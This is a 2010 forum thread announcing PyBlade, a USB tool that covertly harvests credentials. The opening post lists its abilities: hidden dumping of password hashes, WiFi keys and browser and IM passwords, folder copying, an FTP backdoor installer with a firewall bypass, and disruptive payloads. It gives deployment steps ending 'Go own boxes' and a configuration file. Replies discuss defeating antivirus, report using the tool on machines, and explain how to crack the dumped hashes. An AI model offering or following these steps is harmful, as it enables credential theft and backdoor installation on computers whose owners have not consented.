sablefoxx Posted August 11, 2010 Share Posted August 11, 2010 (edited) PyBlade v0.3 About: Some people have been asking for an updated switchblade to run on Vista/7 computers so I thought I'd throw something together. It's a work in progress, I'm also fairly new to Python so no making fun of my code :D Please download and report bugs or requested features!Current Abilities: -Gathers system info, running processes, and local IP settings -Dumps SAM file, via pwdump -Dumps saved WiFi keys -Dumps IM passwords -Dumps IE saved passwords -Dumps IE history -Dumps Firefox passwords -Dumps Chrome passwords -Easy to configure via conf file -Auto prompts for UAC if enabled -Works on 64-bit machines -Completely hidden (other than UAC prompt) -Keyboard Randomizer payload -Landmine payload -Emo Computer payload -Rick Roll payload -IE Homepage payload -Save logs in .txt, .html, or .xml format -U3 support via .u3p file -Support for file slurping -FTP backdoor installer (w/ XP Firewall bypass) Planned Updates: -Netcat backdoor installer -AV Bypass / Evade -Save all logs in .html / .xml formatDownloads:PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bfPyBlade Source Code v0.3 (Includes payloads' source code)U3 Support (.u3p) *BETA**** Change Log *** v0.1-Gathers system info, running processes, and network connections -Dumps SAM file, via pwdump -Dumps saved WiFi keys -Dumps IM passwords -Dumps IE saved passwords -Dumps IE history -Dumps Firefox passwords -Dumps Chrome passwords -Easy to configure via conf file -Auto prompts for UAC if enabled -Works on 64-bit machines -Completely hidden (other than UAC prompt)v0.2-Added Keyboard Randomizer payload -Added Landmine payload -Added Change IE homepage payload -Added comments to code -Changed sysinfo to collect local IP settings -Added options to save logs as .txt, .html, or .xml -Added U3 support -Checks to see if Firefox is installed before dumping passwordsv0.3-Added Emo Computer payload (harmless don't worry) -Added Random Rick Roll payload -Added support for file slurping -Added icons for .exe's -Added FTP Server backdoor -Correctly sets file extensions when saving logs in .html/.xml -Added ability to bypass XP Firewall, and hide exceptions from the GUI -Added time stamps to log directories*** Quick Setup Guide *** Setup for Non-U3 Drives: 0. Obtain a USB drive, and put on a Glitch Mob album 1. Download latest version of PyBlade 2. Extract then copy the contents of PyBlade.rar to the root of your USB drive 3. Edit blade.conf to do your bidding (see below) 4. Go own boxesSetup for Unmodified U3 Drives: 0. Obtain a U3 USB drive, and put on a album 1. Download latest version of PyBlade 2. Extract then copy the contents of PyBlade.rar to the root the flash partition on the U3 drive 3. Edit blade.conf to do your bidding (see below) 4. Download F_Bex.u3p (see above) 5. Open the U3 menu, click "Add Programs" and "Install from My Computer" 6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted 7. Go own boxesConfigure Your Blade: 1. Open "blade.conf" in your favorite text editor (or notepad) 2. Enable/Disable programs by changing their execute value (Enable = 1) Here are the default settings for v0.3:# -------------------------------- # SwitchBlade Configuration File # -------------------------------- # Log File Type # Possible values; text, html, xml log=html # System Dumps sysinfo=1 pwdump=1 wifi=1 mspass=1 iepw=1 iehist=1 ffpw=1 chromepw=1 # Payloads keyrand=0 landmine=0 rickroll=0 emo=0 # Change IE Homepage iehome=0 iehome_url=http://google.com # Backdoors ftpme=0 # File Slurping # Seperate multiple directories using;'s slurp=0 slurp_dirs=C:\Files;C:\Files2 Note that lines starting with '#' are comments, and are ignored during execution, do NOT comment out lines to disable programs, just set their execute value to 0 3. Some lines contain strings;logs= Change this to set how the log files are saved (.log, .html, .xml)iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons 4. To manually execute run "bex.exe"Payloads: Keyboard Randomizer: This program randomizes all keyboard input while its running (keyrand). Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine). Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo). FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme). Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).Note: All payloads are activated on reboot (except for FTPme). Let me know if you find bugs, and come say hi on IRC! Edited August 23, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
okiwan Posted August 11, 2010 Share Posted August 11, 2010 wow you wernt joking. your the man! cant wait to try it out. THANKS! Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 11, 2010 Author Share Posted August 11, 2010 (edited) Whoops, forgot a file you may want to re-download it, also just found a couple bugs, working on a fixes. Edit --Fixed problems! Edited September 24, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Jen Posted August 11, 2010 Share Posted August 11, 2010 I thought it stopped things from autorunning with .inf? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 11, 2010 Author Share Posted August 11, 2010 (edited) I thought it stopped things from autorunning with .inf? It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support. Edited August 11, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
m1k Posted August 11, 2010 Share Posted August 11, 2010 Well done Batman !! ;) Quote Link to comment Share on other sites More sharing options...
Zimmer Posted August 11, 2010 Share Posted August 11, 2010 Nice! Quote Link to comment Share on other sites More sharing options...
misfitsman805 Posted August 11, 2010 Share Posted August 11, 2010 Nice! Keep up the good work man! Can't wait for future versions! XD Quote Link to comment Share on other sites More sharing options...
IrishFavor Posted August 13, 2010 Share Posted August 13, 2010 so far looks great. thank you for all the work on this project. Quote Link to comment Share on other sites More sharing options...
m1k Posted August 14, 2010 Share Posted August 14, 2010 It works on XP... any Vista,Seven reports? Quote Link to comment Share on other sites More sharing options...
xantos_gambit Posted August 16, 2010 Share Posted August 16, 2010 Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/ Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 16, 2010 Author Share Posted August 16, 2010 (edited) Updated to v0.2, added payloads, and some other small stuff. Pretty cool, needs a AV killer or something, most AVs destroy it before it gets a chance to do anything useful/ Hmm... I have yet to see this done well, perhaps I'll try something. I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled. "bex.exe" shouldn't be flagged VirusTotal The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles. Edited August 17, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Mr. Stuky Posted August 17, 2010 Share Posted August 17, 2010 Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 17, 2010 Author Share Posted August 17, 2010 Sorry for my noobness, but can you make a tutorial how to use these scripts? And hwo to make it work with U3 FlashDrive. thanks and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman I'll throw something together, brb. Quote Link to comment Share on other sites More sharing options...
Mr. Stuky Posted August 17, 2010 Share Posted August 17, 2010 Thanks, Really appreciated. Btw Added you so we can TF2 Sometime. ;] Quote Link to comment Share on other sites More sharing options...
Jen Posted August 17, 2010 Share Posted August 17, 2010 I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to impliment it? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 17, 2010 Author Share Posted August 17, 2010 I noticed you removed the .ink icon exploit as part of your planned features. Is it impossible to implement it? More difficult then originally anticipated, may add it later. Quote Link to comment Share on other sites More sharing options...
m1k Posted August 17, 2010 Share Posted August 17, 2010 Antivirus disabling.... also if my Avira dosn't see anything.... ;) Quote Link to comment Share on other sites More sharing options...
w1ldf1re Posted August 17, 2010 Share Posted August 17, 2010 Awesome that you're now using Python! I've been doing a course in it at university and it's nice to be able to see what you're doing in your programs and to be able to fix any errors that I get. Hope I can contribute at some stage. :) Quote Link to comment Share on other sites More sharing options...
w1ldf1re Posted August 17, 2010 Share Posted August 17, 2010 (edited) (delete) Edited August 17, 2010 by w1ldf1re Quote Link to comment Share on other sites More sharing options...
okiwan Posted August 17, 2010 Share Posted August 17, 2010 just tried it on a vista machine. i had to disable AVG security cause it was being a pain. every thing seems to be working great. didnt get any passwords though cause i guess the user didnt save them. im gonna have to try it on anouther computer. is there any way it can get the windows login password too? Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted August 17, 2010 Author Share Posted August 17, 2010 just tried it on a vista machine. i had to disable AVG security cause it was being a pain. every thing seems to be working great. didnt get any passwords though cause i guess the user didnt save them. im gonna have to try it on anouther computer. is there any way it can get the windows login password too? Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack Quote Link to comment Share on other sites More sharing options...
Zimmer Posted August 17, 2010 Share Posted August 17, 2010 sablefoxx have you been able to find any implementation details on the .lnk exploit, from what I read if has something to do with the parsing of the picture on any shortcut with shell32.dll, but that is all I could fund. Quote Link to comment Share on other sites More sharing options...
xantos_gambit Posted August 17, 2010 Share Posted August 17, 2010 I have offically tried this on a win7 machine it did the job, haven't cracked the hash it gave me yet so we will see, combiine this with the pocket knifes file slurping and we have a good skidde tool. Quote Link to comment Share on other sites More sharing options...
okiwan Posted August 17, 2010 Share Posted August 17, 2010 Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack this is whats in my pwdump log file. is there something wrong here? cause the machine does have a login password. i know the password but why wont it dump it? or is this what its supposed to look like and i have to crack it with that program? Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: VM:1000:NO PASSWORD*********************:NO PASSWORD*********************::: Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.